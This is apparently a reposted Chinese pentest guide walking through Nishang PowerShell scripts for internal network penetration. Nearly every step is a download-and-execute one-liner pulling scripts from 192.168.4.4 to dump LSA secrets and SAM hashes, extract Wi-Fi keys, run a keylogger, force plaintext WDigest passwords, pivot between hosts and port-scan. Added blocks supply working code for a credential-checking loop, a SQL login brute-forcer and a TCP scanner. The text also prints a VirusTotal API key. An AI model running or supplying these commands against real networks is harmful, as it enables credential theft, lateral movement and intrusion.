Get-Information:
Information gathering: Run-dialog and MRU history such as FTP access, share connections and
PuTTY sessions;
drives, installed applications, the hosts file, running processes and wireless network records:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-Information.ps1'); Get-Information"
Get-LSASecret:
Retrieves LSA secrets from the target. It reads HKLM\SECURITY, so it needs local administrator privileges:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-LSASecret.ps1'); Get-LsaSecret"
Get-PassHashes
Dumps local account password hashes from the SAM (needs local administrator privileges):
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHashes.ps1'); Get-PassHashes"
Get-WLAN-Keys:
Retrieves the keys of saved wireless profiles (via netsh wlan ... key=clear):
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-WLAN-Keys.ps1'); Get-WLAN-Keys"
Keylogger:
Keylogger: (not tested)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Keylogger.ps1'); Keylogger"
Invoke-MimikatzWDigestDowngrade
Dumps user passwords in plaintext on Windows 8.1 and Server 2012 by re-enabling WDigest credential caching (the UseLogonCredential registry value) and running Mimikatz after the user has logged on again (test failed). The function to call is Invoke-MimikatzWDigestDowngrade:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Invoke-MimikatzWDigestDowngrade.ps1'); Invoke-MimikatzWDigestDowngrade"
Get-PassHints:
Retrieves the password hints of Windows users from the target. The hints are read from the SAM, so this also needs administrator privileges:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHints.ps1'); Get-PassHints"
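Every one-liner above pulls script text over plain HTTP from 192.168.4.4 and hands it straight to IEX, so whatever that web server returns is what runs on the target. The following is an added example, not code from Nishang or from the original post: it keeps the same cradle shape but refuses to execute the download unless its SHA-256 matches a digest recorded from the staged copy. The function name, the digest placeholder and the usage lines are assumptions.

```powershell
# Added example (not part of Nishang or the original post).
# Download a script as raw bytes, verify a pinned SHA-256, and only then return
# the text for IEX. Record the digest from the copy staged on the web server:
#   Get-FileHash .\nishang-master\Gather\Get-Information.ps1 -Algorithm SHA256
function Get-VerifiedScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$ExpectedSha256   # hex digest, case-insensitive
    )
    # DownloadData rather than DownloadString: hash the exact bytes served, so the
    # value matches Get-FileHash on the staged file regardless of charset handling.
    $bytes = (New-Object Net.WebClient).DownloadData($Url)

    $sha = [System.Security.Cryptography.SHA256]::Create()
    try {
        $actual = ($sha.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
    } finally {
        $sha.Dispose()
    }

    if ($actual -ne $ExpectedSha256.ToLower()) {
        throw "Refusing to execute $Url : served SHA-256 $actual, pinned $($ExpectedSha256.ToLower())"
    }

    # Decode for execution; strip a UTF-8 BOM that the parser would otherwise see as text.
    [System.Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
}

# Same shape as the page's cradle, with the verification in front of IEX
# ('<digest from Get-FileHash>' is a placeholder for the recorded value):
$base = 'http://192.168.4.4/nishang/nishang-master'
IEX (Get-VerifiedScript -Url "$base/Gather/Get-Information.ps1" -ExpectedSha256 '<digest from Get-FileHash>')
Get-Information
```

The pin only protects against the staging server (or something in the path to it) serving a different file than the one you put there; once IEX runs the decoded text, ScriptBlock logging and AMSI see it exactly as they would with the original one-liner.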
Pivot
Create-MultipleSessions
Checks a set of credentials against multiple computers and optionally creates a PSSession on each one (WinRM must be reachable on the targets):
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Create-MultipleSessions.ps1'); Create-MultipleSessions -filename .\servers.txt"
Examples:
PS > Create-MultipleSessions -filename .\servers.txt
The above command uses the credentials of the current PowerShell session and checks them against the computers listed in servers.txt.
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -Creds
The above command prompts for a username and password to check against the remote computers.
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
The above command uses the credentials of the current PowerShell session, checks them against the computers listed in servers.txt, and creates a PSSession for each one that succeeds.
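As an added example (not Nishang's Create-MultipleSessions), here is the check-then-create loop the three examples describe, written out with New-PSSession so each mode maps to visible code: the current logon token by default, an explicit credential like -Creds, and -CreateSessions to keep the sessions. The function name and the output object layout are my own; servers.txt is assumed to hold one hostname or IP per line.

```powershell
# Added example, not Nishang's code. Try a WinRM session on each host; report
# success/failure per host and optionally keep the sessions for later use.
function Test-RemoteCredential {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [pscredential]$Credential,      # omit to use the current logon token, like the script's default
        [switch]$CreateSessions
    )
    foreach ($computer in $ComputerName) {
        $params = @{ ComputerName = $computer; ErrorAction = 'Stop' }
        if ($Credential) { $params.Credential = $Credential }
        try {
            $session = New-PSSession @params
            if ($CreateSessions) {
                # Keep it: reuse later with Invoke-Command -Session or Enter-PSSession.
                [pscustomobject]@{ Computer = $computer; Success = $true; Session = $session; Error = $null }
            } else {
                Remove-PSSession $session
                [pscustomobject]@{ Computer = $computer; Success = $true; Session = $null; Error = $null }
            }
        } catch {
            [pscustomobject]@{ Computer = $computer; Success = $false; Session = $null; Error = $_.Exception.Message }
        }
    }
}

# Current token against every host in servers.txt (assumed: one host per line):
Test-RemoteCredential -ComputerName (Get-Content .\servers.txt)

# Prompt for explicit credentials, like -Creds, and keep the sessions, like -CreateSessions:
Test-RemoteCredential -ComputerName (Get-Content .\servers.txt) -Credential (Get-Credential) -CreateSessions
Get-PSSession
```

New-PSSession talks WinRM (TCP 5985, or 5986 for HTTPS), so a failure is also what you get when the target simply has remoting disabled or firewalled; the Error field tells "access denied" apart from "cannot connect".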
Run-EXEonRemote (not tested)
Run-EXEonRemote copies an executable to multiple computers and executes it there. The path of the executable is set inside the script file (edit it before use), and Invoke-Command -FilePath reads the local copy of the script and runs it on each host from servers.txt over WinRM, so the file must be on disk; the IEX prefix only loads it into the current session:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Run-EXEonRemote.ps1'); Invoke-Command -FilePath .\Run-EXEonRemote.ps1 -ComputerName (Get-Content .\servers.txt)"
Invoke-NetworkRelay
Invoke-NetworkRelay creates network relays (port forwards) between computers using netsh interface portproxy. The example below runs against 192.168.254.141 and makes that host listen on 8888 and forward each connection to 192.168.1.22:445; portproxy rules persist across reboots until they are deleted:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Invoke-NetworkRelay.ps1'); Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141"
Prasadhak
Prasadhak
Checks the hashes of running processes against the VirusTotal database (needs a VirusTotal API key and outbound Internet access from the target):
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Prasadhak/Prasadhak.ps1'); Prasadhak -APIKEY 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0"
Scan
Brute-Force (Invoke-BruteForce)
Brute force: FTP, Active Directory, MSSQL, SharePoint. Called with no parameters as below, the function prompts for its mandatory parameters; the examples show the full form. Against domain accounts every failed guess counts toward the lockout policy, so check the threshold first:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Invoke-BruteForce.ps1'); Invoke-BruteForce"
Examples:
.EXAMPLE
PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
Brute force the SQL Server SQLServ01 with the users listed in users.txt and the passwords in wordlist.txt.
.EXAMPLE
PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose
Brute force a Domain Controller of targetdomain.com with the users listed in users.txt and the passwords in wordlist.txt.
Since -StopOnSuccess is specified, the brute force stops at the first success.
.EXAMPLE
PS > cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
Brute force the SQL service on all the servers listed in servers.txt.
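The loop behind the SQL examples, as an added example that is not Nishang's Invoke-BruteForce: one SQL login attempt per user/password pair with a short connect timeout, the -StopOnSuccess behaviour of the second example, and computer names taken from the pipeline as in the third. It covers SQL authentication only. The function name and the wordlist paths in the usage line are assumptions; it is written for Windows PowerShell 5.1, where System.Data.SqlClient is loaded by default.

```powershell
# Added example, not Nishang's code: SQL login guessing with StopOnSuccess semantics.
function Invoke-SqlLoginCheck {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$ComputerName,
        [Parameter(Mandatory)][string]$UserList,
        [Parameter(Mandatory)][string]$PasswordList,
        [switch]$StopOnSuccess
    )
    begin {
        $users     = Get-Content $UserList
        $passwords = Get-Content $PasswordList
    }
    process {
        foreach ($user in $users) {
            foreach ($password in $passwords) {
                # The builder handles quoting, so a ';' or quote in a password cannot
                # break, or inject into, the connection string.
                $csb = New-Object System.Data.SqlClient.SqlConnectionStringBuilder
                $csb['Data Source']     = $ComputerName
                $csb['User ID']         = $user
                $csb['Password']        = $password
                $csb['Connect Timeout'] = 3     # seconds; keeps a dead host from stalling the run

                $conn = New-Object System.Data.SqlClient.SqlConnection $csb.ConnectionString
                try {
                    $conn.Open()
                    [pscustomobject]@{ ComputerName = $ComputerName; User = $user; Password = $password }
                    if ($StopOnSuccess) { return }   # done with this host, next pipeline item
                    break                            # found this user's password, next user
                } catch {
                    $base = $_.Exception.GetBaseException()
                    # 18456 = "Login failed for user": a normal miss. Anything else
                    # (no listener, network error) means further guesses are pointless.
                    if ($base -is [System.Data.SqlClient.SqlException] -and $base.Number -eq 18456) { continue }
                    Write-Verbose "$ComputerName : $($base.Message)"
                    return
                } finally {
                    $conn.Dispose()
                }
            }
        }
    }
}

# Computers from the pipeline, stop at the first valid login on each host (paths assumed):
Get-Content C:\test\servers.txt |
    Invoke-SqlLoginCheck -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -StopOnSuccess -Verbose
```

SQL logins can carry a lockout policy of their own (CHECK_POLICY), and Windows-authenticated or domain logins count against the domain threshold, so a wordlist of any size should be run user-by-user only after checking the policy with net accounts /domain.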
Port-Scan
Port scan:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Port-Scan.ps1'); Port-Scan -StartAddress 192.168.4.1 -EndAddress 192.168.4.254"
Examples:
.PARAMETER TimeOut
Time (in milliseconds) before an attempt times out; default 100
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
.EXAMPLE (sweep the whole range for live hosts and resolve their names)
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
.EXAMPLE (scan the default ports)
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
Use the above to run a port scan on the default ports.
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
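An added example (not Nishang's Port-Scan) of the two pieces the help above describes: expanding a StartAddress..EndAddress range, and a TCP connect check per port bounded by a timeout in milliseconds, which is what -TimeOut controls. The port list, function names and output layout are my own; the script's real default port list is not reproduced here.

```powershell
# Added example, not Nishang's code.
function Get-IPv4Range {
    param(
        [Parameter(Mandatory)][string]$StartAddress,
        [Parameter(Mandatory)][string]$EndAddress
    )
    # Convert dotted-quad to a host-order UInt32 so the range can be iterated.
    $toInt = {
        param([string]$ip)
        $b = [System.Net.IPAddress]::Parse($ip).GetAddressBytes()
        [Array]::Reverse($b)
        [BitConverter]::ToUInt32($b, 0)
    }
    $start = & $toInt $StartAddress
    $end   = & $toInt $EndAddress
    for ($i = $start; $i -le $end; $i++) {
        $b = [BitConverter]::GetBytes([uint32]$i)
        [Array]::Reverse($b)
        (New-Object System.Net.IPAddress -ArgumentList (,$b)).ToString()
    }
}

function Invoke-TcpScan {
    param(
        [Parameter(Mandatory)][string[]]$Target,
        [int[]]$Port = @(21, 22, 23, 25, 53, 80, 135, 139, 443, 445, 3389, 5985),  # assumed list
        [int]$TimeOut = 100,     # milliseconds per connection attempt
        [switch]$ResolveHost
    )
    foreach ($t in $Target) {
        $hostName = $null
        if ($ResolveHost) {
            try { $hostName = [System.Net.Dns]::GetHostEntry($t).HostName } catch { }
        }
        foreach ($p in $Port) {
            $client = New-Object System.Net.Sockets.TcpClient
            try {
                $ar = $client.BeginConnect($t, $p, $null, $null)
                # A refusal (RST) completes quickly; a filtered port never answers, so the
                # timeout, not the refusal, is what bounds the total scan time.
                $open = $ar.AsyncWaitHandle.WaitOne($TimeOut, $false) -and $client.Connected
            } catch {
                $open = $false
            } finally {
                $client.Close()
            }
            [pscustomobject]@{ Target = $t; HostName = $hostName; Port = $p; Open = [bool]$open }
        }
    }
}

# Equivalent of the 500 ms example above, showing open ports only:
Invoke-TcpScan -Target (Get-IPv4Range 192.168.0.1 192.168.0.254) -TimeOut 500 -ResolveHost |
    Where-Object Open
```

Raising -TimeOut trades speed for accuracy on slow links: 100 ms is enough on a LAN, but across a VPN or WAN hop a real open port can take longer to complete the handshake and will be reported closed.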
Utility scripts:
Download
Download a file to the target (first argument is the URL, second the file name to save as):
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Utility/Download.ps1'); Download http://192.168.4.4/php.txt netfile.txt"
Default download path is the running user's temp directory, here:
C:\Users\Administrator\AppData\Local\Temp
Import the whole module, or dot-source a single script and run it:
PS > Import-Module .\nishang.psm1
PS > . C:\nishang\Gather\Get-Information.ps1
PS > Get-Information
PS > Get-Help [scriptname] -Full   # get the help for a script
This article was first published on the WeChat official account 关注安全技术: 一些内网渗透所用Poweshell脚本(二) (Some PowerShell scripts used for internal network penetration, part 2)